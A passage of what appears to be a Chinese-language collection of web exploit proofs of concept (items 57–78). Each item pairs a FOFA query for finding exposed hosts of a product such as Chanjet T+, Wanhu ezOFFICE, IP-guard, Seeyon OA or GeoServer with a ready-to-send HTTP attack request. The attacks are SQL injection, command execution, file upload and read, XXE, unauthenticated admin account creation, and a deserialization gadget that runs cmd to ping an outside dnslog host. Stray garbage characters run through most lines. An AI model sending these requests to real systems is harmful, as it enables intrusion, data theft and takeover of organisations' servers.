- |: D% K5 R$ N9 u! S* u{* t& [, P2 \" q D% E8 G
"storeID":{
0 ^6 k6 }# E0 M "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",. J4 |; m3 f. g* K! b) S f3 V
"MethodName":"Start",4 h& k- F( B' w5 Q
"ObjectInstance":{: M0 r: T2 C* J$ o
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 H. R" Q- |- ^- I: c. q "StartInfo": {
2 y, L$ i' k9 r5 y+ v( H# V "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," C2 F+ g. `: S8 D/ g# i
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
2 Q$ ^! ~) e. e, z* O9 X2 F2 A) @/ a }: C/ s, u% k4 ~! r! Y3 @
}
. B, v9 F; T) y; q3 b0 t0 g }
A E* O4 b( K" C, G- W}8 p0 A( U: B6 c) l* t
( {& g' J5 m5 n H: X
7 P- `% G# l( W% c" M' {! v6 V1 v0 l57. 畅捷通T+ keyEdit.aspx SQL注入- R2 A; e/ f0 N$ s
FOFA:app="畅捷通-TPlus"
: I N' r0 [5 W( W4 a' X8 Y+ PGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.19 K5 L0 u5 M- c/ J9 J
Host: host
- }; d& n8 y. U* I" s6 xUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 r1 @( G% l1 }" M. ^. t+ [Accept-Charset: utf-8) Z& H. g. T, c* ?$ D$ g
Accept-Encoding: gzip, deflate1 B3 O; j5 M. R" u& U2 D
Connection: close
/ z2 R9 V& K: i0 \ x ~+ v" T! K: }5 X. z
2 P( T$ c* n+ X- A/ i: `- j: ]58. 畅捷通T+ KeyInfoList.aspx sql注入- N) o+ K* L: N" Q
FOFA:app="畅捷通-TPlus"
( E# ^% ~& s# w( D" _GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
$ j# G) g! X8 A% VHost: your-ip5 ?- {, v( f8 t. ^- r a( M6 x
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
5 A( ?! K4 z4 K: g+ E9 SAccept-Charset: utf-8* e! x$ f! Z- |) Y, z/ Q
Accept-Encoding: gzip, deflate# M$ Z7 N' X3 g6 n
Connection: close) H5 \& |6 M8 c% W9 i1 I, j* V0 z
: F* U Q' {, H) ^9 |5 V
- F. v V2 B- `59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行3 Q& r1 r8 t/ b" N4 g' v; o/ j
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
$ v9 i8 S2 N1 L- ?3 X- q3 VPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
4 t0 c, t" X# hHost: 192.168.86.128:9090: Q6 B' I- U; a4 S6 `. T
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
) R8 \3 d7 @8 v; X4 F0 ?9 c3 Q8 o1 CConnection: close) C2 U& D8 @* {
Content-Length: 16699 O4 N1 z/ z2 g# H# a/ w- H
Accept: */*$ Y. k- g- }1 g0 F
Accept-Language: en5 [' F0 k9 a. \7 r8 ~, j0 U5 a
Content-Type: application/x-www-form-urlencoded
, ]7 i7 p( y$ G/ fAccept-Encoding: gzip/ F% d& |' V- L& y$ A8 {0 l
+ d. a& B' U, {6 f
PAYLOAD
: `+ E7 J1 `! M( S8 B3 _: F
, G5 y# g0 c/ Z6 ?
. {( o7 _' o* F2 T& K60. 百卓Smart管理平台 importexport.php SQL注入
& H% _& P6 R9 K# kFOFA:title="Smart管理平台"! R6 w% ]% K) T' c( h3 s& N0 q
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.12 j9 P+ P+ \4 O/ C2 B, W2 `, x0 |
Host:" e7 S( Z8 E, A% y/ G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# ?% o( V* h$ o1 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 F% [# o. V8 w2 u1 f( H0 e* {
Accept-Encoding: gzip, deflate
$ E+ V d6 x. y9 X$ Z' ^Accept-Language: zh-CN,zh;q=0.9
3 E0 ?0 h5 |6 L0 {) EConnection: close
# d$ b5 m" p- e6 ]1 ?4 w6 ?" x& V" f* m( D% I' S, l
: Q: [; u+ C M/ t; Y8 y9 K
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传9 A2 |" D3 V* |& O; y
FOFA: title="欢迎使用浙大恩特客户资源管理系统"; D% v) N$ b5 Y/ E+ W
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
6 D6 v& i8 `3 F5 B/ g' N/ M" w/ EHost: x.x.x.x4 w7 d' k9 ]! Z1 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ U. [7 X# H2 m2 Y! ?# ~
Connection: close/ |+ f3 k9 z" R% |' l9 | D
Content-Length: 27
' Q1 D# d/ o; [4 D eAccept: */*6 I' x0 n: T. ~- V* v) u
Accept-Encoding: gzip, deflate
1 v" a8 {; I) ?) a' o! h2 o: T& o" N7 xAccept-Language: en
/ E4 B" f6 Q: a* _8 `' c+ ZContent-Type: application/x-www-form-urlencoded
0 B d6 ] {* t
) s; f7 {1 Y+ k. F! G+ P8uxssX66eqrqtKObcVa0kid98xa0 \5 Y0 d! r4 D4 g
5 R* w `) t. D0 U' r9 t6 N. ]7 v, V. r9 f
. |9 @* r5 y8 Z9 _- S# w3 Z
62. IP-guard WebServer 远程命令执行
0 N% G! n% G9 C" O3 ^) dFOFA:"IP-guard" && icon_hash="2030860561"% [8 J; M! ]9 Y& Z7 { {
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1, `1 v' B* f* ^
Host: x.x.x.x" R1 g6 ` O1 R9 \
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
+ C8 V5 ~' Z% ]" t% G+ |' y: dConnection: close
0 c8 O4 [$ c4 |+ \3 U; Z' b; VAccept: */** \- S+ T. B5 T' }
Accept-Language: en
5 H5 N3 y% n' b" pAccept-Encoding: gzip5 T6 \7 f4 f- P# l- p x1 O
]% @5 {! W7 z2 e! b* M5 _
5 w8 U) k" e$ }0 o: A4 e6 q ~访问2 Z$ [& i- F# E" Z( H2 r
- F; ~+ Z2 C5 l8 C
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1+ m0 f! Q# M( F/ D5 }
Host: x.x.x.x; J8 D9 ?% O. V# E3 n5 D, K6 g
9 u0 k% Q0 k6 ]- N
^; W3 Z: f& G* i% A
63. IP-guard WebServer任意文件读取
' Z, V5 ^5 {+ t9 mIP-guard < 4.82.0609.0) C$ P. Q4 i6 v& \
FOFA:icon_hash="2030860561"
* ~/ j3 X& y" t4 A5 ^POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1# L: m3 `% E" Q1 h
Host: your-ip/ I8 Y5 p4 a. I1 @1 P. A9 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 z9 D& E& c; p, y; t8 f( O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ D C& Q+ o5 t9 V# n* q. m7 ^Accept-Encoding: gzip, deflate) D" W" V1 r" Z7 p0 R& ^; x
Accept-Language: zh-CN,zh;q=0.9
z3 B# k; n* m7 }& z, ]( Q! |; o" e1 RConnection: close
) L9 e7 H, Q8 F& k9 sContent-Type: application/x-www-form-urlencoded. N1 U) A/ a" _; G; v% T3 U e
. `5 x0 l Q- }# t; I+ jpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
0 I+ s; c9 b( B2 z& Y6 J- Z* O9 R/ ~7 K8 z0 Z* }/ y8 X4 q. j8 w
64. 捷诚管理信息系统CWSFinanceCommon SQL注入- n6 l9 n- q P8 ]! K; E
FOFA:body="/Scripts/EnjoyMsg.js"7 }1 `' }4 d! s" i3 x2 h) z
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1& _- ?4 J- F/ r, ^0 H: R+ v
Host: 192.168.86.128:9001
; {3 N2 J; P' C; O- Y3 i8 ?) KUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36* ~; d% _. _0 ^4 H( _5 ~
Connection: close4 p& I- V7 |1 w
Content-Length: 3696 H0 \1 D( y. m% w
Accept: */*- Z& g1 L$ ?1 Z' \& T i2 L
Accept-Language: en
( ?% L0 b3 r, OContent-Type: text/xml; charset=utf-8! i# p/ o4 ~; b; I0 k$ E' E
Accept-Encoding: gzip
- x6 s- m: B7 Y+ F( Z7 h( Y
* ?1 Z' w% h! w2 u& ]' B<?xml version="1.0" encoding="utf-8"?>
5 {8 X5 n E J2 f. r! i' H9 |<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">: O# K8 ^# T/ [' n6 H7 ^, {; D
<soap:Body>
$ S9 }; K: L7 ?7 {1 c, _ <GetOSpById xmlns="http://tempuri.org/">
. c8 {7 y0 v I% A! X+ @' W <sId>1';waitfor delay '0:0:5'--+</sId>: J s! G6 {1 M- F
</GetOSpById>5 X0 k# l6 @9 R% n j
</soap:Body>1 m$ |7 D+ E `! T# X$ K
</soap:Envelope>( ^7 d, Y9 ?$ {* @5 T" @; Z; B
" \- o/ E: |3 r6 F0 m" _2 ]3 j
- n( E& j+ P. t, ?- {6 h2 w65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
`+ k4 C) f1 X2 t; bFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
2 H! e5 j+ K2 Q响应200即成功创建账号test123456/123456/ y. M2 H" v: O: G1 r
POST /SystemMng.ashx HTTP/1.1( X3 y( U$ J9 j# B# t; {
Host:
7 y$ G _1 W+ K G/ cUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)) ?( q) U9 V3 J/ d4 k
Accept-Encoding: gzip, deflate
: k' K! y$ r0 [8 M& hAccept: */*
0 }3 S) E; _( ]) T+ S$ g* [) O! JConnection: close7 X* q7 D$ w# |/ R# U+ i% s" A
Accept-Language: en
1 u$ g$ J$ w( p( s' UContent-Length: 1744 s9 o! D( f3 ?7 J6 I
$ m9 V( e( B: y) P: |
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
& S" Z0 Y( R+ q9 K! I
3 Y# N9 a7 f/ P; V. J3 u G# R& F* ~+ e' t
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入% @) ~: J$ p+ ~ l1 E, C* p
FOFA:app="万户ezOFFICE协同管理平台"+ K" I2 [6 W5 S5 A, N
) {; d" Y! S e7 w+ r7 \& A" Z! fGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
! c; t7 y7 Y; }9 l1 O1 BHost: x.x.x.x1 i' F/ a: G8 g' \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% m! u& R, s. a* U) [, }: \Connection: close
" r2 n! G2 S8 D5 d+ N Y6 LAccept: */*5 Q* V% x8 T8 m' g
Accept-Language: en
+ X1 d8 t. I: D7 U5 r- p( ZAccept-Encoding: gzip. f/ o9 _8 M7 I7 l" Y
1 X9 a3 i, J2 i" Z- c" ]* W* @+ ^ n
) j9 d5 d2 Q0 t第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
0 ?0 a) u C/ P# U. r6 v
% p" T& X; Z s2 ^% E: i L67. 万户ezOFFICE wpsservlet任意文件上传. b+ n- p1 O& G1 w+ v2 I2 d# m* u
FOFA:app="万户网络-ezOFFICE"
3 _! v+ S& [/ `newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型' t0 z4 K# S) H& C" q
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.16 P3 _: M: X1 a: Y5 ~3 ?( [
Host: x.x.x.x+ ~5 ^* L% S8 t$ ?9 G6 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
( y' f3 x6 ^2 gContent-Length: 173
) a- | m4 u+ sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
7 \9 u H) W/ K' [9 \Accept-Encoding: gzip, deflate
$ F9 r6 `7 _) h3 f' q4 T( BAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3% x1 R0 }8 Z& d; l. D; w1 E
Connection: close
( @. }- N' q }; s+ W* MContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
, Y/ ?' o& S1 TDNT: 1* R& h5 ]; S6 ?3 u
Upgrade-Insecure-Requests: 1
( x- \; ]: C8 D" M8 p( j9 f' }, b3 p" X: m' {/ g1 ]
--ufuadpxathqvxfqnuyuqaozvseiueerp* P; K- T$ g3 ~. @+ `
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"; N0 p) V1 X$ z+ R Z
9 j" Y+ v( ?# e: i
<% out.print("sasdfghjkj");%>2 j( a! m) T8 \( T! D. g7 I
--ufuadpxathqvxfqnuyuqaozvseiueerp--" _0 U' {1 B9 ?& S, J
8 b' U( s; D3 u8 v+ k
" E" {/ K/ R& {7 S1 W0 l
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
" _' z" e1 n9 H4 U( k. g: r" K1 E! l1 j1 Q8 n- ~& s
68. 万户ezOFFICE wf_printnum.jsp SQL注入
. t: [( i) I" p- B- x0 }FOFA:app="万户ezOFFICE协同管理平台"" }- Q5 `- w [# b* Y, G v
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1! w' y# e6 W) }. L s
Host: {{host}}
" e4 W$ ^7 t5 w4 n1 |2 F! c% ^$ XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.364 M6 B6 C7 h6 q5 k# ~
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8 j( m' a2 o2 k9 {: w8 D* {
Accept-Encoding: gzip, deflate! G' b; \" a( u( J
Accept-Language: zh-CN,zh;q=0.9
1 X/ P; w6 R* ]; H! y& ZConnection: close/ d9 a$ \: s1 F, a- e
: D0 P& ~ e ?& s2 j* M$ |. @& m! b0 m" A$ d* l0 s1 N
69. 万户 ezOFFICE contract_gd.jsp SQL注入
, ^( ^6 B2 b/ A1 w- u n1 uFOFA:app="万户ezOFFICE协同管理平台"' p# W, b& X% B2 I% }' z
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.18 [! `' W* X' I. I6 i, {! z
Host: your-ip
; c/ b( W' o; o3 RUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 [/ [ q$ ~; l" s
Accept-Encoding: gzip, deflate$ X2 r i% p2 P* C2 m. G; }7 i) q3 b
Accept: */*$ b) _) ^. |$ E/ T4 v
Connection: keep-alive3 w+ V. G5 g1 z; k) ^
- n. b% @6 g6 e: s) s
+ `3 _" m, [, p% @* F" E7 @, K70. 万户ezEIP success 命令执行' w: ^/ |; I+ A" r0 h/ k8 r0 Y
FOFA:app="万户网络-ezEIP"
5 R2 P+ F) \1 c8 ?POST /member/success.aspx HTTP/1.1
$ V5 P# p1 {3 p v/ ?) dHost: {{Hostname}}, E0 b, J8 s1 h1 K- X1 J+ q+ H8 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36& \2 z0 \% K9 J
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=- M5 Z5 K6 N$ {! k6 I G
Content-Type: application/x-www-form-urlencoded
3 a2 @) f, R+ v2 r0 L% D; |TYPE: C' t( p5 ~2 y: G2 s" Y* @
Content-Length: 16702, c! ~( v& ~" U9 `
5 V% t- }7 O7 d" c% _, ? o__VIEWSTATE=PAYLOAD) f L5 w2 \5 r
0 k( g* r5 {3 P' L7 u, q7 h8 f$ s: K9 o% `
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
5 Y9 [6 y3 x# A7 |4 uFOFA:body="PM2项目管理系统BS版增强工具.zip"% ~3 a2 N7 Z( W6 T$ m- O: f
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.18 r8 } @- F3 Z" E4 W
Host: x.x.x.xx.x.x.x. Y4 n6 _: z6 R/ N5 v% p4 G
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.366 e; n) i: n/ s
Connection: close+ l. w# R5 {, }; O0 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 V2 b" ]* C4 S- R5 p* X& R# Z# RAccept-Encoding: gzip, deflate' ?4 L$ @/ y- h0 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* ~2 f" R- O( R; F% bUpgrade-Insecure-Requests: 11 e/ N0 J7 V. l% l
' U% X: e( C0 }/ {5 h
- Z. u( N4 l- T% K8 ?72. 致远OA getAjaxDataServlet XXE
+ c" i( u# V1 B7 LFOFA:app="致远互联-OA". j# _5 _' o2 ]( n* [
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
& u6 |7 H7 A# W% ^) R* ^+ M8 lHost: 192.168.40.131:8099
- ^1 Y# {4 D0 t6 T1 @: D+ |User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
" e/ |+ `# \0 R. E* N* YConnection: close$ Z' F. q* N3 T* w* W9 [1 I
Content-Length: 5837 A/ v( x3 H ^3 w2 B
Content-Type: application/x-www-form-urlencoded
2 g. ^/ k: m/ L: h' u |0 YAccept-Encoding: gzip- {4 M$ h9 x- b. U5 ^) f
# g& D- C! I; @. K9 HS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
( ~2 i0 [2 [' A. O! B" M' F7 `& H/ | v/ Y
1 ~1 V& u# W; R
73. GeoServer wms远程代码执行6 y$ [3 v( s& [! X
FOFA:icon_hash=”97540678”
3 X4 T1 I+ T6 W+ j+ W4 n0 kPOST /geoserver/wms HTTP/1.1
& s, u0 n# r% {Host:9 o# b2 {2 j/ D3 q; `/ F' f& _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.369 a! r" E/ Q5 N5 q, F9 Q
Content-Length: 1981
1 c( {5 ~5 I, e, U& m. _Accept-Encoding: gzip, deflate4 }9 m) i/ U2 E3 z2 w
Connection: close
& w( s" j* Z, aContent-Type: application/xml
* _, y# r& J( p, aSL-CE-SUID: 3" s+ P$ h2 X6 F
9 r5 a- X7 w6 m! K4 [* w0 p! I
PAYLOAD
3 j$ Q5 ]; X5 k3 k3 P. u1 R, V
$ h H% H3 b; C6 J
% t& _3 h( z! i3 b0 b, T8 U' v9 C74. 致远M3-server 6_1sp1 反序列化RCE+ P' B' p4 H9 z7 h6 ?' T5 p
FOFA:title="M3-Server"
, p5 f. f" k4 @5 }PAYLOAD/ B- l k0 V7 }3 U9 O9 d, l; \- E
# v0 K; G% G( i( L" P
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
- p) @# ~5 ^" w' u$ f# BFOFA:app="TELESQUARE-TLR-2005KSH"0 ^2 ]$ R2 d( ]
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
' Z5 [: w; ~/ ~- KHost: x.x.x.x+ t( f; R9 k( W$ x. p5 h n! t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& h) q" m* O! d- v& S8 ]$ V9 A
Connection: close
% F; D3 S; z9 \$ UAccept: */*
# h' F4 m! v' G7 b5 s0 \Accept-Language: en
5 `/ U. U1 u, \1 cAccept-Encoding: gzip
- s4 X9 o6 r5 L. N, F3 s. B# N& f& a! K
4 g# W& a, o% I0 O. bGET /cgi-bin/test28256.txt HTTP/1.16 {( b# n/ J* l' `
Host: x.x.x.x, V, b& R' N1 d% X
/ J& `: j1 \ n) w: f
( X8 [* c( t* }$ k |0 A# o76. 新开普掌上校园服务管理平台service.action远程命令执行
- h% W" B9 K! n- T/ [! i+ l5 lFOFA:title="掌上校园服务管理平台"
* X0 i6 K3 q* h: [1 PPOST /service_transport/service.action HTTP/1.1
2 i' s# k' L: C* PHost: x.x.x.x
9 Z9 s- C. `* A9 m0 ]. w7 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.05 e5 C' m% ^' H% O% `. c4 e H
Connection: close
' w7 g# h0 ], I% g2 A! l I' }& ^Content-Length: 2112 {4 b) J" G$ E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 x2 i/ }. M" O; A. E# K
Accept-Encoding: gzip, deflate1 J$ u* f! y% e: W/ g& g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 @. ^: C4 [8 N5 _Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4( p d, G* I& _1 Q$ F3 l: m: o5 j
Upgrade-Insecure-Requests: 10 o" X' ]6 K6 G! E* q
( n( q: A5 ]$ w3 K& h. _3 |
{$ b$ J1 m q, t+ K
"command": "GetFZinfo",6 I ^; d6 d! h; L+ _
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
" E; o% x& V n ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
$ T& P: D$ q# W8 c5 m}" u. C) ~8 Q8 S, h/ q/ w
: R( B. y6 H( P, @( V# S1 X
8 i) X& B4 z- Z) K4 h5 G0 u% ?: G
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1: n) v+ @3 j9 F: H$ p5 O
Host: x.x.x.x! V# q( H8 \$ d
! Q5 w' m8 x9 u# d. D4 n
8 \; L2 E5 f5 e/ P9 C! N
$ R# x- w- o7 ~6 D- m% J$ s0 F77. F22服装管理软件系统UploadHandler.ashx任意文件上传 v# j0 q5 @/ E5 ]5 `! v
FOFA:body="F22WEB登陆"
0 K: x: ?, G1 C1 _& m" q% rPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.10 z/ S/ Y! q) [
Host: x.x.x.x
! e$ [9 q* ^3 W2 E* j0 k: {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. M- {3 b1 L- N4 D$ A! p% wConnection: close
9 z7 ?) U, ^. w* P k' Z1 b. VContent-Length: 433% i* J" b$ i) Q- V2 t
Accept: */*1 F# L$ @, H4 l; U2 ^) Z
Accept-Encoding: gzip, deflate
* }8 W2 X$ W2 G0 ]' L7 vAccept-Language: zh-CN,zh;q=0.9
, z5 a e2 x3 i: F1 O. fContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix# V6 ~! {# Y9 m% k$ \5 V- ^
: r, L* u$ D* T1 C# h# M; k3 D
------------398jnjVTTlDVXHlE7yYnfwBoix
; Y7 X4 e4 N7 V7 {Content-Disposition: form-data; name="folder"8 P8 x; C3 f# N Q$ e9 z/ V
u6 D3 N& F4 d5 G3 }
/upload/udplog
1 |3 B6 d/ N( r+ L------------398jnjVTTlDVXHlE7yYnfwBoix. ^% C r! R& B
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
: ~2 C" C5 d6 m# YContent-Type: application/octet-stream! R0 N) h1 R9 E. O1 \4 C
/ e/ l+ T- |' C2 r: @
hello1234567
/ T2 U- m5 r m------------398jnjVTTlDVXHlE7yYnfwBoix6 F# y. N& _, S/ H
Content-Disposition: form-data; name="Upload"
* r+ c1 k/ d2 ]' J; h6 C, D9 M- }3 R0 n7 S: G+ V3 X' }, @
Submit Query
& Q. u. G O3 _9 i+ H) y------------398jnjVTTlDVXHlE7yYnfwBoix--
2 P7 F5 ^- {3 b8 S0 Y; Y
9 {) E9 t- D: R/ Y% ?3 F) S0 \' z( |2 m4 ~2 {
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传, @! P) o8 w' K3 @ x
FOFA:icon_hash="2001627082"1 g2 V: K! J8 n
POST /Platform/System/FileUpload.ashx HTTP/1.1
5 g1 p& l; Q9 K7 l5 j+ f" w fHost: x.x.x.x2 \, q, d: ?4 F1 V2 H6 H# N% n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# J; }7 R3 J9 u* |$ P. x5 AConnection: close/ y% p* @* S D
Content-Length: 336: X9 f, U4 h( M% H
Accept-Encoding: gzip
* n& _3 N7 W: m! _6 N7 Z9 QContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
: e9 Y( n% @* a
" h. @; F* j- t3 @' }------YsOxWxSvj1KyZow1PTsh98fdu6l9 s+ g7 Y4 [+ }: J6 K7 b. o
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
. A9 I' ~$ U2 c2 S5 H6 aContent-Type: image/png
: y0 V/ ~ k6 G. `! i% {- Z8 F- \- S/ u# ?9 {& B# ?9 I
YsOxWxSvj1KyZow1PTsh98fdu6l
) V( z) e; Q: u& M% ?------YsOxWxSvj1KyZow1PTsh98fdu6l) e+ Y- ^8 B6 b; c& M. n$ F4 w
Content-Disposition: form-data; name="target"
4 t3 l' k! F4 _/ h. \9 k
, @! G4 w( f: s6 a+ G) x5 H9 K! Y, h/Applications/SkillDevelopAndEHS/7 ~$ M5 x- p, g1 ?$ ~! x; l
------YsOxWxSvj1KyZow1PTsh98fdu6l--
4 c, M U6 }* h4 X
+ l- I- v6 \2 |4 z* M! e
